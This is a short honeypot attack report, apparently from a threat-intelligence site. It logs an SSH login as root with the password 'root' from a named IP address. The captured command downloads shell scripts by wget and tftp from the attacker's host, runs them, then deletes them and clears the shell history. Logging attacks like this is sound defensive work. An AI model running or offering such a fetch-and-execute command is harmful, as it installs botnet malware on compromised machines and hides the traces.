Attack Report for Observation

Header

Time

2023/03/10, 03:17:52 (GMT)

Transaction ID

92AASHAVZYQ4NETH

Service

ssh

Location

US (United States)

Attacker

185.225.73.130

Classification

Web script execution

Harm Potential

High

Description

Script execution method downloaded from the www (web)

Content

185.225.73.130 client username 'root' and password 'root' entered
185.225.73.130 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.225.73.130/Hellfire.sh; chmod 777 *; sh Hellfire.sh; tftp -g 185.225.73.130 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate